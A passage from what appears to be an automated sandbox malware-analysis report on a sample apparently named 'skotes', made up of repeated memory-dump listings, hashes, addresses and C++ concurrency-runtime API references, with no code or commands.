                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_SchedulerValidValue
                                                          • String ID:
                                                          • API String ID: 2033596534-0
                                                          • Opcode ID: 2339fa40c2b759e92c0178da1301f90e62942c3e6d41dad50bd4c6812f2ca6b4
                                                          • Instruction ID: 519ee7f8da5f94745c6be54286a3a9fdb6776ca4fda23ecca7843a3b732e7e83
                                                          • Opcode Fuzzy Hash: 2339fa40c2b759e92c0178da1301f90e62942c3e6d41dad50bd4c6812f2ca6b4
                                                          • Instruction Fuzzy Hash: F621B3719456089FDB04EFA4D882EADB7F0EF05310F204069F111AB2E3EB31AE06DB51
                                                          APIs
                                                          • Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 00C0A069
                                                          • Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 00C0A07F
                                                          • Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 00C0A0CB
                                                            • Part of subcall function 00C0AB41: List.LIBCONCRT ref: 00C0AB77
                                                          • Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 00C0A0DB
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Concurrency::details::$ExecutionHardwareProxy::Scheduler$AffinityAffinity::CoreCountCurrentFixedIncrementListResourceResource::
                                                          • String ID:
                                                          • API String ID: 4213627143-0
                                                          • Opcode ID: 95f6f3e04bc30c2c56652e178bef781f6c890df816116e37bc92e839a086442b
                                                          • Instruction ID: 63d770fb975049713a71bbfad66c29fd92a9cb24d93d8a761346b897df4be6f1
                                                          • Opcode Fuzzy Hash: 95f6f3e04bc30c2c56652e178bef781f6c890df816116e37bc92e839a086442b
                                                          • Instruction Fuzzy Hash: F7218C315007189FCB25EF65D9918AAF3F9FF48710B004A5EE443A76A1DB34F905DBA2
                                                          APIs
                                                          • ListArray.LIBCONCRT ref: 00C04893
                                                          • ListArray.LIBCONCRT ref: 00C048A5
                                                            • Part of subcall function 00C05555: _InternalDeleteHelper.LIBCONCRT ref: 00C05564
                                                          • ListArray.LIBCONCRT ref: 00C048AF
                                                          • _InternalDeleteHelper.LIBCONCRT ref: 00C048C8
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ArrayList$DeleteHelperInternal
                                                          • String ID:
                                                          • API String ID: 3844194624-0
                                                          • Opcode ID: 59c586bf22ee40d60db68020848831393cb1776e95ab72bcb65b5fa58c8035d4
                                                          • Instruction ID: 7bfa14cf73a8f722595406f73f90f5a4f3a9e693dcf23d5f0af3b16cbcbe5e2b
                                                          • Opcode Fuzzy Hash: 59c586bf22ee40d60db68020848831393cb1776e95ab72bcb65b5fa58c8035d4
                                                          • Instruction Fuzzy Hash: B201D671700521BFCA19BBA4C8C6E7FB76BBF447107000929FA0497696DB20EC25DBA0
                                                          APIs
                                                          • ListArray.LIBCONCRT ref: 00C0EE6A
                                                          • ListArray.LIBCONCRT ref: 00C0EE7C
                                                            • Part of subcall function 00C0EF29: _InternalDeleteHelper.LIBCONCRT ref: 00C0EF3B
                                                          • ListArray.LIBCONCRT ref: 00C0EE86
                                                          • _InternalDeleteHelper.LIBCONCRT ref: 00C0EE9F
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ArrayList$DeleteHelperInternal
                                                          • String ID:
                                                          • API String ID: 3844194624-0
                                                          • Opcode ID: c23f4856fabf270b066f75f53d0d095c1ff781d229eb294e961ca7fddd2f915b
                                                          • Instruction ID: 689a1aec5675ba35dbd944668559e3affea8919d352952b43d534f1fd95db46c
                                                          • Opcode Fuzzy Hash: c23f4856fabf270b066f75f53d0d095c1ff781d229eb294e961ca7fddd2f915b
                                                          • Instruction Fuzzy Hash: 4301F931340525BFCB257BA4C8C6D7EBB6ABF85710B040969F51497692CB60FC26D6D0
                                                          APIs
                                                          • ListArray.LIBCONCRT ref: 00C0D0C5
                                                          • ListArray.LIBCONCRT ref: 00C0D0D7
                                                            • Part of subcall function 00C0C6B2: _InternalDeleteHelper.LIBCONCRT ref: 00C0C6C4
                                                          • ListArray.LIBCONCRT ref: 00C0D0E1
                                                          • _InternalDeleteHelper.LIBCONCRT ref: 00C0D0FA
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
